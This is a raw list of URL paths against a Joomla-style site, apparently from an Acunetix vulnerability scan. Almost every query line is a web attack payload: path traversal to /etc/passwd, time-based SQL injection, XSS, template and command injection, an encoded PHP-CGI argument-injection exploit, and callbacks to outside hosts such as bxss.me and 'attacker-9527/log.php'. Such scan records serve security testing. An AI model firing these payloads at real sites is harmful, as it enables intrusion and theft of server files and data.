/search/?ordering=popular&searchphrase=all&searchword=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/search/?ordering=popular&searchphrase=all&searchword={{9999410*9999368}}
/search/?ordering=popular&searchphrase=any&searchword=%252fetc%252fpasswd
/search/?ordering=popular&searchphrase=any&searchword=%5e(%23%24!%40%23%24)(()))******
/search/?ordering=popular&searchphrase=any&searchword=-1%20OR%202%2b124-124-1=0%2b0%2b0%2b1%20--%20
/search/?ordering=popular&searchphrase=any&searchword=..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/search/?ordering=popular&searchphrase=any&searchword=/.././.././.././.././.././.././.././../etc/./passwd%2500
/search/?ordering=popular&searchphrase=any&searchword=/www.vulnweb.com
/search/?ordering=popular&searchphrase=any&searchword=1*1*1*1
/search/?ordering=popular&searchphrase=any&searchword=12345'\
/search/?ordering=popular&searchphrase=any&searchword=<!--
/search/?ordering=popular&searchphrase=any&searchword=acux8963%C0%BEz1%C0%BCz2a%90bcxuca8963
/search/?ordering=popular&searchphrase=any&searchword=file://etc/passwd
/search/?ordering=popular&searchphrase=file://etc/passwd&searchword=
/search/?ordering=popular&searchphrase=http:/testasp.vulnweb.com/t/fit.txt%3F.jpg&searchword=
/search/?ordering=popular&searchphrase[$acunetix]=1&searchword=
/search/?ordering=set%7cset%26set&searchphrase=all&searchword=
/search/?ordering[]=newest&searchphrase=any&searchword=
/search/?searchword=&ordering=acxScRiPtkzsyScRiPt&searchphrase=all
/search/?searchword=&ordering=acxScRiPtkzsyScRiPt&searchphrase=exact
/search/?searchword=&ordering=alpha&searchphrase=acxScRiPtkzsyScRiPt&areas[0]=newsfeeds
/search/?searchword=&ordering=alpha&searchphrase=all&areas[0]=content
/search/?searchword=&ordering=alpha&searchphrase=all&areas[0]=newsfeeds
/search/?searchword=&ordering=alpha&searchphrase=exact&areas[0]=acxScRiPtkzsy9362ScRiPt
/search/?searchword=&ordering=alpha&searchphrase=exact&areas[0]=categoriesacxScRiPtkzsy9658ScRiPt
/search/?searchword=&ordering=category&searchphrase=all&areas[0]=newsfeeds
/search/?searchword=&ordering=category&searchphrase=allacxScRiPtkzsyScRiPt
/search/?searchword=&ordering=newest&searchphrase=all&areas[0]=newsfeeds
/search/?searchword=&ordering=newestacxScRiPtkzsyScRiPt&searchphrase=exact&areas[0]=content
/search/?searchword=&ordering=newestacxScRiPtkzsyScRiPt&searchphrase=exact&areas[0]=weblinks
/search/?searchword=&ordering=oldest&searchphrase=all&areas[0]=weblinks
/search/?searchword=&ordering=oldest&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=categories
/search/?searchword=&ordering=popular&searchphrase=acxScRiPtkzsyScRiPt&areas[0]=contacts
/search/?searchword=&ordering=popular&searchphrase=all&areas[0]=categoriesacxScRiPtkzsy9593ScRiPt
/search/?searchword=&ordering=popular&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=newsfeeds
/search/?searchword=&ordering=popular&searchphrase=any&areas[0]=categoriesacxScRiPtkzsy9922ScRiPt
/search/?searchword=&ordering=popular&searchphrase=exact&areas[0]=acxScRiPtkzsy9758ScRiPt
/search/?searchword='\
/search/?searchword=acu3395%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3395&ordering=popular&searchphrase=any&areas[0]=categories
/search/?searchword=acu4052%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4052&ordering=oldest&searchphrase=all&areas[0]=categories
/search/?searchword=acu5999%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5999&ordering=oldest&searchphrase=any&areas[0]=newsfeeds
/search/?searchword=acu6241%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6241&ordering=oldest&searchphrase=all&areas[0]=content
/search/?searchword=acu7994%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7994&ordering=newest&searchphrase=all&areas[0]=content
/search/?searchword=acu9065%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9065&ordering=category&searchphrase=any&areas[0]=categories
/search/?searchword=acu9247%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9247&ordering=alpha&searchphrase=any&areas[0]=newsfeeds
/search/?searchword=acu9572%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9572&ordering=popular&searchphrase=any&areas[0]=weblinks
/search/?searchword=acu9991%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9991&ordering=newest&searchphrase=any&areas[0]=contacts
/search/?searchword=the&ordering=alpha&searchphrase=acxScRiPtkzsyScRiPt&areas[0]=contacts
/search/?searchword=the&ordering=alpha&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=categories
/search/?searchword=the&ordering=category&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=newsfeeds
/search/?searchword=the&ordering=newest&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=newsfeeds
/search/?searchword=the&ordering=newest&searchphrase=any&areas[0]=contacts
/search/?searchword=the&ordering=newest&searchphrase=exact&areas[0]=categoriesacxScRiPtkzsy9382ScRiPt
/search/?searchword=the&ordering=newest&searchphrase=exact&areas[0]=content
/search/?searchword=the&ordering=newestacxScRiPtkzsyScRiPt&searchphrase=any&areas[0]=content
/search/?searchword=the&ordering=newestacxScRiPtkzsyScRiPt&searchphrase=exact&areas[0]=newsfeeds
/search/?searchword=the&ordering=oldest&searchphrase=all&areas[0]=newsfeeds
/search/?searchword=the&ordering=oldest&searchphrase=all&areas[0]=weblinks
/search/?searchword=the&ordering=oldest&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=weblinks
/search/?searchword=the&ordering=oldest&searchphrase=exact&areas[0]=categories9274910
/search/?searchword=the&ordering=oldest&searchphrase=exact&areas[0]=categoriesacxScRiPtkzsy9036ScRiPt
/search/?searchword=the&ordering=popular&searchphrase=acxScRiPtkzsyScRiPt&areas[0]=content
/search/?searchword=ul.menu&ordering=acxScRiPtkzsyScRiPt&searchphrase=all
/search/?searchword=ul.menu&ordering=newest&searchphrase=acxScRiPtkzsyScRiPt&areas[0]=categories
/search/?searchword=ul.menu&ordering=newest&searchphrase=acxScRiPtkzsyScRiPt&areas[0]=contacts
/search/?searchword=ul.menu&ordering=newest&searchphrase=all&areas[0]=categoriesacxScRiPtkzsy9164ScRiPt
/search/?searchword=ul.menu&ordering=newest&searchphrase=all&areas[0]=newsfeeds
/search/?searchword=ul.menu&ordering=newest&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=newsfeeds
/search/?searchword=ul.menu&ordering=newest&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=weblinks
/search/?searchword=ul.menu&ordering=popular&searchphrase=allacxScRiPtkzsyScRiPt&areas[0]=weblinks
/search/?searchword=ul.menu'\
/search/?searchword=ul.menu9107670&ordering=popular&searchphrase=any&areas[0]=content
/search/?searchword=ul.menu9295309&ordering=category&searchphrase=all&areas[0]=categories
/search/?searchword=ul.menu9385804&ordering=alpha&searchphrase=all&areas[0]=categories
/search/?searchword=ul.menu9474528&ordering=oldest&searchphrase=any
/search/?searchword=ul.menu9729984&ordering=newest&searchphrase=all
/search/?searchword=ul.menu\
/search/?searchword=ul.menuu0022onmouseover=kzsy(9580)u0022&ordering=popular&searchphrase=all&areas[0]=newsfeeds
/search/?searchword=ul.menuu0022onmouseover=kzsy(9593)u0022&ordering=alpha&searchphrase=any&areas[0]=contacts
/search/?searchword=ul.menuu0022onmouseover=kzsy(9660)u0022&ordering=category&searchphrase=any&areas[0]=categories
/search/?searchword={{10000175*10000467}}&ordering=oldest&searchphrase=all&areas[0]=newsfeeds
/search/?searchword={{10000229*10000202}}&ordering=oldest&searchphrase=all
/search/?searchword={{10000286*9999258}}&ordering=popular&searchphrase=any&areas[0]=contacts
/search/?searchword={{10000420*9999615}}&ordering=oldest&searchphrase=all&areas[0]=content
/search/?searchword={{9999032*10000133}}&ordering=popular&searchphrase=all&areas[0]=contacts
/search/?searchword={{9999114*10000456}}&ordering=alpha&searchphrase=all&areas[0]=weblinks
/search/?searchword={{9999356*10000009}}&ordering=newest&searchphrase=any
/search/?searchword={{9999363*9999160}}&ordering=category&searchphrase=any
/search/?searchword={{9999364*9999776}}&ordering=alpha&searchphrase=any&areas[0]=contacts
/users/
/users/?view=%5c
/users/?view=%5e(%23%24!%40%23%24)(()))******
/users/?view=%E5%98%8A%E5%98%8DSomeCustomInjectedHeader:%20injected_by_wvs
/users/?view=%bf'%bf\
/users/?view=%f0''%f0\
/users/?view=';print(md5(acunetix_wvs_security_test));%24a='
/users/?view='\
/users/?view=)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
/users/?view=-1%20OR%202%2b582-582-1=0%2b0%2b0%2b1
/users/?view=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
/users/?view=291-0-0-
/users/?view=307-0-0-0-0
/users/?view=558'
/users/?view=8OWgL7fS';%20waitfor%20delay%20'0:0:2'%20--%20
/users/?view=;print(md5(acunetix_wvs_security_test));
/users/?view=WEB-INF%5cweb.xml
/users/?view=\
/users/?view=acux9481%C0%BEz1%C0%BCz2a%90bcxuca9481
/users/?view=http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
/users/?view=index.php%00
/users/?view=login
/users/?view=login%25'%20AND%202*3*8=6*8%20AND%20'Yyte'!='Yyte%25
/users/?view=login%26lt;ScRiPt%26gt;Uqla(9380)%26lt;/sCripT%26gt;
/users/?view=login<%25%20contenteditable%20onresize=Uqla(9827)>
/users/?view=login<%25div%20style=width:expression(Uqla(9405))>
/users/?view=login<W9DTAR>E5VAQ[!%2b!]</W9DTAR>
/users/?view=login<img%20sRc='http:/attacker-9527/log.php%3f
/users/?view=login<svg%09%0a%0b%0c%0d%a0%00onload=Uqla(9664);>
/users/?view=login\\u003CScRiPt\\Uqla(9856)\\u003C/sCripT\\u003E
/users/?view=login}body{acu:Expre/**/SSion(Uqla(9102))}
/users/?view=response.write(9495727*9561186)
/users/?view=set%7cset%26set
/users/?wvstest=javascript:domxssExecutionSink(1,%22'%5C%22%3E%3Cxsstag%3E()locxss%22)
/extO4gmi');select%20pg_sleep(2);%20--%20-uncategorised/1-testsayfasi
/file://etc/passwd/content/category
/file://etc/passwd/users/
/http:/hitjj0oOIuFSr.bxss.me/search/
/http:/testasp.vulnweb.com/t/xss.html%3f%2500.jpg/content/category
/set%7cset%26set/content/category
/set%7cset%26set/users/
/index.php<body%20onload=JIfz(9172)>/search/
/index.php<ge4Oh6</content/category
/index.php<img%20src=xyz%20OnErRor=KmPG(9846)>/content/category
/index.php<img/src=\
/index.php<img<!--%20-->%20src=x%20onerror=alert(9213);/><!--%20-->/search/
/index.php<video><source%20onerror=\
/index.php?format=!(()%26%26!%7c*%7c*%7c&type=rss
/index.php?format=%24{9999993%2b9999290}&type=atom
/index.php?format=)&type=atom
/index.php?format=-1%20OR%202%2b183-183-1=0%2b0%2b0%2b1&type=rss
/index.php?format=-1%20OR%202%2b444-444-1=0%2b0%2b0%2b1%20--%20&type=atom
/index.php?format=-1%20OR%202%2b757-757-1=0%2b0%2b0%2b1&type=atom
/index.php?format=-1%20OR%203%2b444-444-1=0%2b0%2b0%2b1%20--%20&type=atom
/index.php?format=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&type=atom
/index.php?format=1%20waitfor%20delay%20'0:0:2'%20--%20&type=atom
/index.php?format=60-0-0-0-0&type=atom
/index.php?format=Http:/testasp.vulnweb.com/t/fit.txt&type=atom
/index.php?format=RF3eTlQ2';select%20pg_sleep(6);%20--%20&type=rss
/index.php?format=WEB-INF%5cweb.xml&type=atom
/index.php?format=WEB-INF%5cweb.xml&type=rss
/index.php?format=feed&type=%252fetc%252fpasswd
/index.php?format=feed&type=%40%401rfpd
/index.php?format=feed&type='%2bresponse.write(9924438*9597749)%2b'
/index.php?format=feed&type=(select(0)from(select(sleep(2)))v)/*'%2b(select(0)from(select(sleep(2)))v)%2b'\
/index.php?format=feed&type=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
/index.php?format=feed&type=1%00%c0%a7%c0%a2%252527%252522
/index.php?format=feed&type=371-0-0-
/index.php?format=feed&type=<!--
/index.php?format=feed&type=atom
/index.php?format=feed&type=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/index.php?format=feed&type=set%7cset%26set
/index.php?format=feed'\
/index.php?format=http:/hitknOaz89C0Q.bxss.me/&type=atom
/index.php?format=index.php%00&type=rss
/index.php?format=index.php&type=atom
/index.php?format=mnNysu5Z&type=rss
/index.php?option=%24{%40print(md5(acunetix_wvs_security_test))}%5c
/index.php?option=../../../../../../../../../../etc/passwd%00.jpg
/index.php?option=\
/index.php?option=http:/testasp.vulnweb.com/t/xss.html%3f%2500.jpg
/index.php?wvstest=javascript:domxssExecutionSink(1,%22'%5C%22%3E%3Cxsstag%3E()locxss%22)&option=com_search
/index.php\
/jboss-net/services/listServices
/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type%3DServer
/libraries
/logs/
/media/system/images/printButton.png
/media/system/js/caption.js
/media/system/js/core.js
/media/system/js/mootools-core.js
/media/system/js/mootools-more.js
/phpmyadmin/main.php
/phpmyadmin2/
/plugins/
/r2foTWNt'));select%20pg_sleep(3);%20--%20/users/
/response.write(9480314*9217198)/search/
/sdk/../../../../../../../../../../../../../etc/passwd
/server-info
/set%7cset%26set/1-testsayfasi
/set%7cset%26set/content/article/1-testsayfasi
/statistics/
/statystyka/
/templates/beez_20/css/general.css
/templates/beez_20/css/layout.css
/templates/beez_20/css/personal.css
/templates/beez_20/css/print.css
/templates/beez_20/fonts/TitilliumMaps29L002.otf
/templates/beez_20/images/
/templates/beez_20/images/content_bg.gif
/templates/beez_20/images/nature/arrow1.gif
/templates/beez_20/images/nature/karo.gif
/templates/beez_20/images/personal/tabs_back.png
/templates/beez_20/javascript/hide.js
/templates/beez_20/javascript/md_stylechanger.js
/templates/system/css/system.css
/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/tmp
/wstat/
/
/login.php
/security.php
/administrator/index.php
/cgi-bin/php4-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
/index.php
/search
/search/
/users/?task=
/users/?task=!(()%26%26!%7c*%7c*%7c
/users/?task=%252fetc%252fpasswd
/users/?task=%26nslookup%20NfrbUnOc%26'%5c\
/users/?task=%40%40EnBdz
/users/?task=%5c
/users/?task=%bf'%bf\
/users/?task='\
/users/?task=(select(0)from(select(sleep(2)))v)/*'%2b(select(0)from(select(sleep(2)))v)%2b'\
/users/?task=(select(0)from(select(sleep(4)))v)/*'%2b(select(0)from(select(sleep(4)))v)%2b'\
/users/?task=-1%20OR%203%2b729-729-1=0%2b0%2b0%2b1%20--%20
/users/?task=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.register
/users/?task=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
/users/?task=../../../../../../../../../../../../../../../proc/version
/users/?task=../../../../../../../../../../etc/passwd%00.login
/users/?task=../../../../../../../../../../../../../../../../etc/passwd
/users/?task=/WEB-INF/web.xml
/users/?task=/etc/passwd
/users/?task=1'\
/users/?task=;print(md5(acunetix_wvs_security_test));
/users/?task=<!--
/users/?task=A0Kxrw1j';%20waitfor%20delay%20'0:0:6'%20--%20
/users/?task=Http:/testasp.vulnweb.com/t/fit.txt
/users/?task=KCXg2tGf
/users/?task=LOYDRBlf');select%20pg_sleep(6);%20--%20
/users/?task=USkGA3VO';%20waitfor%20delay%20'0:0:6'%20--%20
/users/?task=WEB-INF%5cweb.xml
/users/?task=\
/users/?task=http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.register
/users/?task=if(now()=sysdate()%2csleep(4)%2c0)/*'XOR(if(now()=sysdate()%2csleep(4)%2c0))OR'\
/users/?task=index.php%00
/users/?task=qTo3ig5t'));select%20pg_sleep(4);%20--%20
/users/?task=rD7LLCWz';select%20pg_sleep(6);%20--%20
/users/?task=registration.register
/users/?task=remind.remind
/users/?task=remind.remind\
/users/?task=reset.request
/users/?task=set%7cset%26set
/users/?task=tR8CX6jB'));select%20pg_sleep(4);%20--%20
/users/?task=testasp.vulnweb.com
/users/?task=user.login
/users/?task[]=registration.register
/users/?task[]=user.login
/phpmoadmin/moadmin.php
